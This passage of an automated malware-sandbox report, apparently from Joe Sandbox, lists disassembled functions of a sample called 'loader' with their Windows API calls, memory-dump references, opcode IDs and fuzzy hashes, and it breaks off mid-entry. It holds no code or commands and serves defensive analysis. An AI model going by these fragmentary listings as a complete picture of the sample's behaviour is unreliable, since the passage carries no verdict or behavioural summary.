              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
              • String ID: CMT
              • API String ID: 1706572503-2756464174
              • Opcode ID: 89b5a235816c6dfbb66aea382c7b3af61553a4db45f69b5cc0ebacdf2bebd4c2
              • Instruction ID: aa674232d79dff5492404fb86ec7c3f1fd57530bb1a6cf746f4f29a4396c3522
              • Opcode Fuzzy Hash: 89b5a235816c6dfbb66aea382c7b3af61553a4db45f69b5cc0ebacdf2bebd4c2
              • Instruction Fuzzy Hash: B662F4716002448FDF29DF74C8996EA3BE5AF68304F09457DECDA8B2C6DBB0A945CB50
              Function 0012866F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00128767
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00128771
              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0012877E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID: ^PpL
              • API String ID: 3906539128-914357616
              • Opcode ID: ae4be7f93b689d9dfa8a843acd8103568a0dd60537f6cae9606f7cc81d7a1283
              • Instruction ID: e8aa224b7e9dca372e0dabcfe6d863429372aac65e6f86b72800ba05df374b55
              • Opcode Fuzzy Hash: ae4be7f93b689d9dfa8a843acd8103568a0dd60537f6cae9606f7cc81d7a1283
              • Instruction Fuzzy Hash: A731B2759012289BCB25DF68D889BDCBBB8BF18310F5041EAE81CA7251EB309BC58F45
              Function 0012CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
              • Instruction ID: 71de03ca78cd3f93847087b3f4ccccdfa8fd822f929037c0211696f521a22e5e
              • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
              • Instruction Fuzzy Hash: 6F023D71E001299FDF14CFA9D9906AEFBF1EF88314F254269D919E7384D731AA51CB80
              Function 0011A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
              Download Yara Rule
              APIs
              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0011A662
              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0013E600,?,?), ref: 0011A6B1
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FormatInfoLocaleNumber
              • String ID:
              • API String ID: 2169056816-0
              • Opcode ID: c704e8bfceb8c98eafd99d9af733ba3991dad7bb4e30abeeb5d4cb3a0a3185c4
              • Instruction ID: 6768ba711cdf082fef55ebef16e34ab7d133f34560c2d8283908cb17085d6f16
              • Opcode Fuzzy Hash: c704e8bfceb8c98eafd99d9af733ba3991dad7bb4e30abeeb5d4cb3a0a3185c4
              • Instruction Fuzzy Hash: 95015E76500308BAD710CFA5EC06F9B77FCEF19711F004422FA1497590D3B09A64C7A5
              Function 00106EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(0011117C,?,00000200), ref: 00106EC9
              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00106EEA
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: 7c9239b3777014f516d86eb807bda225836a08860b202c8b7ff0fecc5bce4922
              • Instruction ID: 0fd67ea1316870e3341c508a4946b3fbff4a4baf48aea3477ce2b8c3d051239a
              • Opcode Fuzzy Hash: 7c9239b3777014f516d86eb807bda225836a08860b202c8b7ff0fecc5bce4922
              • Instruction Fuzzy Hash: E6D0C7353C4302BFEA154B74CC05F277B546755B42F108514B366D94D0C6B090649619
              Function 00131194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0013118F,?,?,00000008,?,?,00130E2F,00000000), ref: 001313C1
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: dbc33a3a8f66f01969771f56eab5d16911e5e7875119439dc9aa9e38cfb0b43e
              • Instruction ID: 7314003ce28790e3e3902a33c75ec1b9118e9e6e77b28eeff82ce2ec4c5f7326
              • Opcode Fuzzy Hash: dbc33a3a8f66f01969771f56eab5d16911e5e7875119439dc9aa9e38cfb0b43e
              • Instruction Fuzzy Hash: CEB14C71610609EFD719CF28C48ABA57BE0FF45364F298658E9D9CF2A1C335E992CB40
              Function 0010407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: gj
              • API String ID: 0-4203073231
              • Opcode ID: 02951a193916a6d6dcc611bcbd474706276eefb64e5fee717c509395137222b2
              • Instruction ID: 7d8fe960ac7b40dd8d811a3a0ddc6de9af71d8058b6c6f2b874d7c29a18ecbb9
              • Opcode Fuzzy Hash: 02951a193916a6d6dcc611bcbd474706276eefb64e5fee717c509395137222b2
              • Instruction Fuzzy Hash: 98F1B3B1A083418FD748CF29D880A1AFBE1BFCC208F15896EF598D7711E734EA558B56
              Function 0010ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
              Download Yara Rule
              APIs
              • GetVersionExW.KERNEL32(?), ref: 0010AD1A
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Version
              • String ID:
              • API String ID: 1889659487-0
              • Opcode ID: 38df2511797a6bd4901027980de4c5d09258d23e2b2d5cf70276bba12de1a454
              • Instruction ID: df4ef2992fca1f29ffce9aa05410d9b320bac6f3701640c37d33d1c10f619280
              • Opcode Fuzzy Hash: 38df2511797a6bd4901027980de4c5d09258d23e2b2d5cf70276bba12de1a454
              • Instruction Fuzzy Hash: CDF01DB490030C8BC728CB68ED416E973B5FB5D711F6006A5EA5943BA4D7B0AD858F51
              Function 0011F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0011EAC5), ref: 0011F068
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 908a10c98f9a84f41054bd5730f7b70cc7f31d3f33c9ad96d5e3343452339301
              • Instruction ID: 75157e92fd5ba6baeaaa8ad3b634a7562066e98f9038a811addbb79c54e153bc
              • Opcode Fuzzy Hash: 908a10c98f9a84f41054bd5730f7b70cc7f31d3f33c9ad96d5e3343452339301
              • Instruction Fuzzy Hash:
              Function 00124969 Relevance: 1.5, Strings: 1, Instructions: 237COMMONLIBRARYCODE
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: ^PpL
              • API String ID: 0-914357616
              • Opcode ID: 2944a1521fcc35d65a607c397d6634abf7cf44fe07ebdf76d6fd9e50af570ce4
              • Instruction ID: 50a4b600d5727e866efd60617b97492fe4721bcd4136410aa9861d2aeb5e5329
              • Opcode Fuzzy Hash: 2944a1521fcc35d65a607c397d6634abf7cf44fe07ebdf76d6fd9e50af570ce4
              • Instruction Fuzzy Hash: B7617871680B3897DE389A28B895BBF2394EB59704F100A1AE883DB2C1D751DDB2C75D
              Function 0012B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: ba8f60fa38e8f8d8d207dacf31d7f12c0cb9fd5aba0c8551c6aefb83aa5c0fb3
              • Instruction ID: 1f21b105a80d0c856ba72fb779b60f8decbf2678e18f75251771b481ed4df59a
              • Opcode Fuzzy Hash: ba8f60fa38e8f8d8d207dacf31d7f12c0cb9fd5aba0c8551c6aefb83aa5c0fb3
              • Instruction Fuzzy Hash: 09A001B86052019BD7408F76AE092093AA9AB456917098269A51AC6960EAA885A09F45
              Function 00115C77 Relevance: .8, Instructions: 800COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
              • Instruction ID: 546676884ac6ea416604c4fb052f52b593bed25d0f44d034343c46e97fd9d7d1
              • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
              • Instruction Fuzzy Hash: F562E671604B859FCB2DCF28C8906F9BBE2AF95304F04857DD8AA8B746D735E985CB10
              Function 001170BF Relevance: .8, Instructions: 773COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
              • Instruction ID: a95146082316595117c6642828766cbd09ed6e731a6cf7a5e22fc2a155c30550
              • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
              • Instruction Fuzzy Hash: 4062CE7160874A9FC71DCF28C8905F9BBB1BB55304F14867EE8A687782D730E996CB90
              Function 0010ED14 Relevance: .7, Instructions: 694COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
              • Instruction ID: f4ee48ee34f9d40ccc3e9b3f11b8de201407d695e0607012356b4a6b7919073b
              • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
              • Instruction Fuzzy Hash: 02523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
              Function 00116A7B Relevance: .5, Instructions: 509COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1edf193618d2bd6bfe18e57fb85fe78748a1b23b39a470f0517b0a1faa7eba05
              • Instruction ID: a07fec6686fb1cbc297c47b1f9123ef682d0ef07038fa61d656ad91a0774da1a
              • Opcode Fuzzy Hash: 1edf193618d2bd6bfe18e57fb85fe78748a1b23b39a470f0517b0a1faa7eba05
              • Instruction Fuzzy Hash: 7B12AEB16047068BC72CCF28D9906B9B3E0FF58308F14893EE597C7A85D775A895CB45
              Function 0010BE13 Relevance: .4, Instructions: 449COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1c8dea7ad5f537cff7882de0b9680d986c580eed0430fa3ce86ae998f3663a65
              • Instruction ID: 4e8538d5a01dfdb8281fc49a9f0e7cfc6801f2128b7781d2859bc714754b4edc
              • Opcode Fuzzy Hash: 1c8dea7ad5f537cff7882de0b9680d986c580eed0430fa3ce86ae998f3663a65
              • Instruction Fuzzy Hash: 7DF166756083018FC718CF29C48496ABBE2FF99314F148A2EF4D597296D7B0E945CF92
              Function 00120B43 Relevance: .3, Instructions: 345COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction ID: 9d3c64e45a46cc4f025e3548eceb9a2e5d31c881efdf587b49da2396016c4133
              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction Fuzzy Hash: FBC1947A2150B30ADF2E8639A53403FFAA15AA67B131A075DD4F2CB1D6FF20D574DA10
              Function 00120F78 Relevance: .3, Instructions: 341COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction ID: 1fb6794d5118ee97e1f3350e52da47f229f4e74bdd81397481a726d9c29b5abe
              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction Fuzzy Hash: 07C1853A2151B30ADF2EC639953413FBAA25AA27B131A076DE4F2CB1C5FF20D574D620
              Function 0012070E Relevance: .3, Instructions: 331COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
